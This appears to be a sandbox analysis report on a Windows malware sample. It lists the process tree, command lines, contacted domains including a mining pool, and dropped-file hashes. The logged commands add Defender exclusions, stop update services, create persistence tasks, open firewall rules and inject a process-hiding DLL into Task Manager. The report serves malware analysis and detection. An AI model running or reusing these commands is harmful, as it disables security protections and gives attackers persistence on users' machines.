C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe

"C:\Users\Admin\AppData\Local\Temp\NEAS.NEAS2555138d315fe335a9cc77ad2c3f8b0bbd0e066f38db784774b26ba2537a0900exeexe_JC.exe"

C:\Users\Admin\AppData\Local\Temp\40DC.exe

C:\Users\Admin\AppData\Local\Temp\40DC.exe

C:\Users\Admin\AppData\Local\Temp\44D5.exe

C:\Users\Admin\AppData\Local\Temp\44D5.exe

C:\Users\Admin\AppData\Local\Temp\40DC.exe

C:\Users\Admin\AppData\Local\Temp\40DC.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\4812.dll

C:\Users\Admin\AppData\Local\Temp\497B.exe

C:\Users\Admin\AppData\Local\Temp\497B.exe

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\4812.dll

C:\Users\Admin\AppData\Local\Temp\517A.exe

C:\Users\Admin\AppData\Local\Temp\517A.exe

C:\Users\Admin\AppData\Local\Temp\566D.exe

C:\Users\Admin\AppData\Local\Temp\566D.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

"C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe"

C:\Users\Admin\AppData\Local\Temp\6042.exe

C:\Users\Admin\AppData\Local\Temp\6042.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\577f58beff" /P "Admin:N"&&CACLS "..\577f58beff" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\cbaeabda-55b5-4251-a64f-9bc2c362aa5c" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe" /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\40DC.exe

"C:\Users\Admin\AppData\Local\Temp\40DC.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\40DC.exe

"C:\Users\Admin\AppData\Local\Temp\40DC.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4944 -ip 4944

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 568

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:R" /E

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\6042.exe

"C:\Users\Admin\AppData\Local\Temp\6042.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xulltjniharo.xml"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xulltjniharo.xml"

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 126.22.238.8.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 onualituyrs.org udp
US 8.8.8.8:53 sumagulituyo.org udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 34.94.245.237:80 sumagulituyo.org tcp
US 8.8.8.8:53 snukerukeutit.org udp
US 8.8.8.8:53 237.245.94.34.in-addr.arpa udp
US 104.198.2.251:80 snukerukeutit.org tcp
US 8.8.8.8:53 lightseinsteniki.org udp
US 8.8.8.8:53 251.2.198.104.in-addr.arpa udp
SG 34.143.166.163:80 lightseinsteniki.org tcp
US 8.8.8.8:53 liuliuoumumy.org udp
SG 34.143.166.163:80 liuliuoumumy.org tcp
US 8.8.8.8:53 163.166.143.34.in-addr.arpa udp
US 8.8.8.8:53 stualialuyastrelia.net udp
RU 91.215.85.17:80 stualialuyastrelia.net tcp
RU 79.137.192.18:80 79.137.192.18 tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 188.114.96.0:443 tcp
US 8.8.8.8:53 alayyadcare.com udp
PS 213.6.54.58:443 alayyadcare.com tcp
US 8.8.8.8:53 18.192.137.79.in-addr.arpa udp
US 8.8.8.8:53 2.36.159.162.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 58.54.6.213.in-addr.arpa udp
US 8.8.8.8:53 montereyclub.org udp
US 172.67.196.133:443 montereyclub.org tcp
US 8.8.8.8:53 loveperry.org udp
US 104.21.86.8:443 loveperry.org tcp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
RU 79.137.192.18:80 79.137.192.18 tcp
US 8.8.8.8:53 stualialuyastrelia.net udp
RU 91.215.85.17:80 stualialuyastrelia.net tcp
FR 51.254.67.186:16176 tcp
RU 31.41.244.27:41140 tcp
US 8.8.8.8:53 186.67.254.51.in-addr.arpa udp
US 8.8.8.8:53 27.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 wirtshauspost.at udp
KR 123.213.233.131:80 wirtshauspost.at tcp
KR 123.213.233.131:80 wirtshauspost.at tcp
US 8.8.8.8:53 131.233.213.123.in-addr.arpa udp
KR 123.213.233.131:80 wirtshauspost.at tcp
KR 123.213.233.131:80 wirtshauspost.at tcp
KR 123.213.233.131:80 wirtshauspost.at tcp
KR 123.213.233.131:80 wirtshauspost.at tcp
KR 123.213.233.131:80 wirtshauspost.at tcp
KR 123.213.233.131:80 wirtshauspost.at tcp
KR 123.213.233.131:80 wirtshauspost.at tcp
KR 123.213.233.131:80 wirtshauspost.at tcp
KR 123.213.233.131:80 wirtshauspost.at tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
KR 123.213.233.131:80 wirtshauspost.at tcp
US 8.8.8.8:53 toennjeskenya.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
KR 123.213.233.131:80 wirtshauspost.at tcp
US 8.8.8.8:53 d15f3592-48ff-45fc-8b11-c515a3d62250.uuid.statsexplorer.org udp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
US 8.8.8.8:53 217.192.94.141.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 server16.statsexplorer.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun.sipgate.net udp
US 162.159.134.233:443 cdn.discordapp.com tcp
BG 185.82.216.108:443 server16.statsexplorer.org tcp
US 3.33.249.248:3478 stun.sipgate.net udp
US 8.8.8.8:53 walkinglate.com udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 248.249.33.3.in-addr.arpa udp
US 8.8.8.8:53 108.216.82.185.in-addr.arpa udp
US 188.114.96.0:443 walkinglate.com tcp

Files

memory/2792-1-0x0000000000810000-0x0000000000910000-memory.dmp

memory/2792-2-0x0000000002510000-0x000000000251B000-memory.dmp

memory/2792-3-0x0000000000400000-0x00000000007CC000-memory.dmp

memory/2792-4-0x0000000000400000-0x00000000007CC000-memory.dmp

memory/3144-5-0x00000000032D0000-0x00000000032E6000-memory.dmp

memory/2792-9-0x0000000002510000-0x000000000251B000-memory.dmp

memory/2792-6-0x0000000000400000-0x00000000007CC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\40DC.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

C:\Users\Admin\AppData\Local\Temp\40DC.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

memory/3764-22-0x0000000002340000-0x00000000023D7000-memory.dmp

memory/3764-23-0x00000000023E0000-0x00000000024FB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\44D5.exe

MD5 77f6f0504e40c95483da601ee1de4a4e
SHA1 628094e713d9f970b63091f6dec44f8feb6e26b2
SHA256 ad6a9a78ad3c6dceb908df1a46665b85c91888b4915fd514c0305048d8e8c111
SHA512 7e01b7917d61054360ef451a0a4a4be856e04bda77082fd63beae43e345af61c10d11f64021182913f74248b41b037a40d83e9cb6f2897a99001591bd2595b63

C:\Users\Admin\AppData\Local\Temp\44D5.exe

MD5 77f6f0504e40c95483da601ee1de4a4e
SHA1 628094e713d9f970b63091f6dec44f8feb6e26b2
SHA256 ad6a9a78ad3c6dceb908df1a46665b85c91888b4915fd514c0305048d8e8c111
SHA512 7e01b7917d61054360ef451a0a4a4be856e04bda77082fd63beae43e345af61c10d11f64021182913f74248b41b037a40d83e9cb6f2897a99001591bd2595b63

memory/3712-26-0x00000000008E0000-0x0000000001088000-memory.dmp

memory/864-28-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\40DC.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

memory/864-33-0x0000000000400000-0x0000000000537000-memory.dmp

memory/864-35-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3712-34-0x0000000076C30000-0x0000000076D20000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4812.dll

MD5 a43d9991721fcd1521677bf31c21ce21
SHA1 0e86179bdcf8685b9bd7da13cd9aa10218f0d81c
SHA256 6561ae7f88e51c053e856b98418192ff7aa85a4f7a16460fb769073fe4535197
SHA512 233bf239b73e9b398d2666ab21cd3ecf930b98c935cbe5e7d5f325fb8bdb9b7ec064a4aecc73228fbb9c35a9f0dd1503e2f66b6f18e5931d0f4567fc2dc02459

memory/3712-39-0x0000000076C30000-0x0000000076D20000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\497B.exe

MD5 9a31a97c4280c2f132874184bc1864eb
SHA1 424f3577733ecdf081cff3c0b765668fa94bf106
SHA256 d50a823a85ebd19a7e61abd091d90b5735c78a4f9f0f32f99c05846c2be45681
SHA512 01facbb50b5cc39e2f91f79e0c3b0448a5804650459c06ee1287f587376df474b30348d825efc8ea6fe2773762db5cad328dc07df53c1273208692d4662dd87c

memory/3712-43-0x0000000076C30000-0x0000000076D20000-memory.dmp

memory/3712-41-0x0000000076C30000-0x0000000076D20000-memory.dmp

memory/3712-45-0x0000000076C30000-0x0000000076D20000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4812.dll

MD5 a43d9991721fcd1521677bf31c21ce21
SHA1 0e86179bdcf8685b9bd7da13cd9aa10218f0d81c
SHA256 6561ae7f88e51c053e856b98418192ff7aa85a4f7a16460fb769073fe4535197
SHA512 233bf239b73e9b398d2666ab21cd3ecf930b98c935cbe5e7d5f325fb8bdb9b7ec064a4aecc73228fbb9c35a9f0dd1503e2f66b6f18e5931d0f4567fc2dc02459

memory/864-48-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3712-46-0x0000000077594000-0x0000000077596000-memory.dmp

memory/3712-44-0x0000000076C30000-0x0000000076D20000-memory.dmp

memory/4300-51-0x0000000001200000-0x0000000001206000-memory.dmp

memory/4300-52-0x0000000010000000-0x00000000101E3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\497B.exe

MD5 9a31a97c4280c2f132874184bc1864eb
SHA1 424f3577733ecdf081cff3c0b765668fa94bf106
SHA256 d50a823a85ebd19a7e61abd091d90b5735c78a4f9f0f32f99c05846c2be45681
SHA512 01facbb50b5cc39e2f91f79e0c3b0448a5804650459c06ee1287f587376df474b30348d825efc8ea6fe2773762db5cad328dc07df53c1273208692d4662dd87c

memory/3712-32-0x0000000076C30000-0x0000000076D20000-memory.dmp

memory/3712-29-0x0000000076C30000-0x0000000076D20000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\517A.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/3712-60-0x00000000008E0000-0x0000000001088000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\517A.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/3712-61-0x0000000005F90000-0x0000000006534000-memory.dmp

memory/3712-62-0x0000000005A80000-0x0000000005B12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\566D.exe

MD5 a6cc2635415872e2cfa5bc586b8d5ac1
SHA1 1ab7f97be976876998982fef5a4f54f29325ff10
SHA256 2c7f187a9372f97c7cb6cdc8143a832d2790188bf194f251460ac990b9074d5e
SHA512 cdf59bea2bfc872b8b39d5553c9b91292afcd73e3c9bf7a95ce14734052e6718cbc6379358447b115dbd2967ad3bd933e135b7e7c40d98ddaca7f50c1ac0f7ad

memory/3712-67-0x0000000005CC0000-0x0000000005D5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\566D.exe

MD5 a6cc2635415872e2cfa5bc586b8d5ac1
SHA1 1ab7f97be976876998982fef5a4f54f29325ff10
SHA256 2c7f187a9372f97c7cb6cdc8143a832d2790188bf194f251460ac990b9074d5e
SHA512 cdf59bea2bfc872b8b39d5553c9b91292afcd73e3c9bf7a95ce14734052e6718cbc6379358447b115dbd2967ad3bd933e135b7e7c40d98ddaca7f50c1ac0f7ad

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/3712-73-0x0000000005C30000-0x0000000005C3A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6042.exe

MD5 71b9cd84ec146c642e076dfb2a87c31a
SHA1 18f593471c238beb864de6425c0343cbb0ea8597
SHA256 19c9a046edef05ab14dcb86a46de9361190b07b0ef628771a00a36564192d309
SHA512 af8402aa35dc3f2fd112359c0a34187756e258f96f67775513b7df2ddaf0f0b7887f730b877ba16ccd8fa5f95f54a47355dacc226f5c6c5cdf2aa7b596a6872c

C:\Users\Admin\AppData\Local\Temp\6042.exe

MD5 71b9cd84ec146c642e076dfb2a87c31a
SHA1 18f593471c238beb864de6425c0343cbb0ea8597
SHA256 19c9a046edef05ab14dcb86a46de9361190b07b0ef628771a00a36564192d309
SHA512 af8402aa35dc3f2fd112359c0a34187756e258f96f67775513b7df2ddaf0f0b7887f730b877ba16ccd8fa5f95f54a47355dacc226f5c6c5cdf2aa7b596a6872c

memory/4356-85-0x0000000000650000-0x0000000000750000-memory.dmp

memory/4356-86-0x0000000000600000-0x000000000060B000-memory.dmp

memory/4356-88-0x0000000000400000-0x00000000005B6000-memory.dmp

memory/2392-89-0x0000000000B30000-0x0000000000B9B000-memory.dmp

memory/3712-91-0x0000000076C30000-0x0000000076D20000-memory.dmp

memory/3712-90-0x00000000008E0000-0x0000000001088000-memory.dmp

memory/3712-94-0x0000000076C30000-0x0000000076D20000-memory.dmp

memory/4060-95-0x0000000000490000-0x000000000049C000-memory.dmp

memory/2392-96-0x0000000000E00000-0x0000000000E80000-memory.dmp

memory/4060-98-0x0000000000490000-0x000000000049C000-memory.dmp

memory/3712-100-0x0000000076C30000-0x0000000076D20000-memory.dmp

memory/3712-106-0x0000000076C30000-0x0000000076D20000-memory.dmp

memory/3712-104-0x0000000076C30000-0x0000000076D20000-memory.dmp

memory/3712-121-0x0000000076C30000-0x0000000076D20000-memory.dmp

memory/864-111-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2392-97-0x0000000000B30000-0x0000000000B9B000-memory.dmp

memory/3712-128-0x0000000076C30000-0x0000000076D20000-memory.dmp

memory/3712-129-0x0000000076C30000-0x0000000076D20000-memory.dmp

memory/4996-131-0x0000000002CE0000-0x00000000030E8000-memory.dmp

memory/4996-132-0x00000000030F0000-0x00000000039DB000-memory.dmp

memory/4356-136-0x0000000000400000-0x00000000005B6000-memory.dmp

memory/3144-134-0x0000000003250000-0x0000000003266000-memory.dmp

memory/4996-133-0x0000000000400000-0x0000000000D6F000-memory.dmp

memory/2392-138-0x0000000000B30000-0x0000000000B9B000-memory.dmp

memory/4300-139-0x0000000002FA0000-0x00000000030BB000-memory.dmp

C:\Users\Admin\AppData\Local\cbaeabda-55b5-4251-a64f-9bc2c362aa5c\40DC.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

memory/864-143-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4300-141-0x00000000030C0000-0x00000000031BF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\40DC.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

memory/4300-147-0x00000000030C0000-0x00000000031BF000-memory.dmp

memory/3712-150-0x0000000005C90000-0x0000000005CAC000-memory.dmp

memory/940-151-0x0000000000400000-0x000000000043E000-memory.dmp

memory/3712-152-0x0000000005C90000-0x0000000005CA5000-memory.dmp

memory/4996-148-0x0000000000400000-0x0000000000D6F000-memory.dmp

memory/3712-153-0x0000000005C90000-0x0000000005CA5000-memory.dmp

memory/3712-155-0x0000000005C90000-0x0000000005CA5000-memory.dmp

memory/940-156-0x00000000735F0000-0x0000000073DA0000-memory.dmp

memory/3712-158-0x0000000005C90000-0x0000000005CA5000-memory.dmp

memory/3712-160-0x0000000005C90000-0x0000000005CA5000-memory.dmp

memory/4300-161-0x00000000030C0000-0x00000000031BF000-memory.dmp

memory/3712-164-0x0000000005C90000-0x0000000005CA5000-memory.dmp

memory/4944-171-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3712-172-0x0000000005C90000-0x0000000005CA5000-memory.dmp

memory/4944-173-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4944-177-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3712-179-0x0000000005C90000-0x0000000005CA5000-memory.dmp

memory/3712-176-0x0000000005C90000-0x0000000005CA5000-memory.dmp

memory/3712-181-0x0000000005C90000-0x0000000005CA5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\40DC.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

memory/3712-183-0x0000000005C90000-0x0000000005CA5000-memory.dmp

memory/3712-186-0x0000000005C90000-0x0000000005CA5000-memory.dmp

memory/940-185-0x00000000083B0000-0x00000000089C8000-memory.dmp

memory/3712-167-0x0000000005C90000-0x0000000005CA5000-memory.dmp

memory/940-166-0x0000000007470000-0x0000000007480000-memory.dmp

memory/940-190-0x00000000075C0000-0x00000000075D2000-memory.dmp

memory/1088-189-0x0000000000400000-0x000000000045A000-memory.dmp

memory/4996-191-0x0000000002CE0000-0x00000000030E8000-memory.dmp

memory/3712-196-0x0000000005C80000-0x0000000005C90000-memory.dmp

memory/940-195-0x0000000007620000-0x000000000765C000-memory.dmp

memory/3712-197-0x0000000076C30000-0x0000000076D20000-memory.dmp

memory/940-198-0x0000000007660000-0x00000000076AC000-memory.dmp

memory/1088-199-0x00000000735F0000-0x0000000073DA0000-memory.dmp

